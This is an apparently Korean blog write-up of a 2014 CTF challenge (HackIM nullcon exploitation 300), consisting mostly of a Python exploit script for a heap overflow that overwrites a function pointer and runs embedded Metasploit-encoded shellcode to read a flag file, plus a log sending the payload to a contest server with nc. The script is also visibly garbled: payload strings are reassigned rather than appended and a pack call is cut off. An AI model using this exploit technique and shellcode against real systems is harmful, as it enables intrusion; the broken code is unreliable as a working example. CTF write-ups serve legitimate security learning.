HackIM nullcon exploitation 300 write-up

0x10 정보보안/0x15 System

by sweetchip 2014. 1. 27. 15:25

.

binary :

vuln3

import time

import struct

# createheap -> allocate_big_heap -> strcpy -> deleteheap(vtable)

# simple function pointer overwrite

# heap overflow

"""

/*

* linux/x86/read_file - 97 bytes

* http://www.metasploit.com

* Encoder: x86/shikata_ga_nai

* VERBOSE=false, PrependSetresuid=false,

* PrependSetreuid=false, PrependSetuid=false,

* PrependSetresgid=false, PrependSetregid=false,

* PrependSetgid=false, PrependChrootBreak=false,

* AppendExit=false, PATH=flag.txt, FD=4

*/

"""

shellcode = ("\xb8\xf6\x7e\xa8\x82\xdd\xc6\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"

"\x12\x31\x43\x14\x03\x43\x14\x83\xeb\xfc\x14\x8b\x43\xb4\x60"

"\x71\x94\xb9\x90\x21\xa5\x70\x5d\x55\x4c\x41\xe5\x55\x4f\x46"

"\x15\xd3\xa8\xcf\xec\x59\x36\xc0\x0e\x9e\xfa\x60\x87\x5c\xbc"

"\x65\x97\x60\xbd\xde\x93\x60\xbd\x20\x56\xe0\x05\x21\x68\xe1"

"\x75\x99\x68\xe1\x75\xdd\xa5\x61\x9d\x18\xca\x9d\xa1\xc5\x58"

"\x03\x39\x24\xd4\xbb\xb1\x38")

p = lambda x : struct.pack("

pr = 0x080487e8

def createheap():

# create heap

payload = "CR"

payload = "A"*38

payload = p(0x64)

payload = "\n"

return payload

def deleteheap():

# delete heap

#payload = "DE"

payload = "\xeb\x50" # short jump

payload = "\x90" * 38

payload = p(0x32)

payload = "\x90" * 0x50

payload = shellcode

payload = "\n"

return payload

def biggheap(size):

# allocate big heap

payload = "RE"

payload = "A" * 38

payload = p(0xc8)

payload = "A" * 36

payload = p(size)

payload = "\n"

payload = "B" * (size - 4 - 4)

payload = p(pr) # ret here

payload = "\n"

return payload

def overflow():

#lead to buffer overflow

payload = "CP"

payload = "A" * 38

payload = p(0x12c)

payload = "\n"

return payload

exploit = ""

exploit = createheap()

exploit = biggheap(0x110)

exploit = overflow()

exploit = deleteheap() # trig vuln

#print exploit

f = open("ex3.txt", "wb")

f.write(exploit)

f.close()

"""

root@ubuntu:/home/sweetchip/Desktop/cyber/ncon# (cat a.txt) | nc 23.23.190.205 8888

637c0c259175d230b08e3e589278ceeb

"""

바이너리를 분석하고 heap overflow를 유도시키고 function table을 덮어 씌우고 덮어씌운 주소를 호출하도록 유도하는

exploit 코드를 작성한다

flag : 637c0c259175d230b08e3e589278ceeb

'0x10 정보보안 > 0x15 System' 카테고리의 다른 글

HackIM nullcon exploitation 100 write-up [exploit] (0)	2014.01.27
HackIM nullcon exploitation 400 write-up [exploit] (5)	2014.01.27
HackIM nullcon exploiation 200 write-up [exploit] (0)	2014.01.27
URLDownloadToFile Shellcode Analysis (3)	2014.01.23
2013 Plaid CTF ropsaurusrex Exploit (1)	2013.11.12